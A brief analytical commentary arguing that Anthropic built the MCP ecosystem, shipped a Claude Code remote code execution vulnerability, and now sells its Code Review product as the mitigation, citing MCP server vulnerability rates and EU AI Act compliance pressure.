The MCP Security Debt: Anthropic Created the Ecosystem, the Vulnerability, and Now the Remedy — at Enterprise Scale

The Model Context Protocol (MCP) grew from zero to 8,000+ public servers in 12 months, driven primarily by Anthropic's Claude Code enterprise deployment. Security research reveals 36.7% of those servers are vulnerable to SSRF, 43% to command execution, and Anthropic's own Claude Code contained CVE-2025-59536 (CVSS 8.7) — a remote code execution vulnerability via repository configuration files. Anthropic launched Code Review on March 9, 2026 — the same day as Copilot Cowork — as a multi-agent governance layer for AI-generated code. The pattern: Anthropic created the ecosystem (MCP standard), shipped the vulnerability (Claude Code CVE), and now sells the mitigation (Code Review), while the EU AI Act's August 2026 deadline creates mandatory compliance urgency that makes Code Review a procurement requirement rather than optional tooling.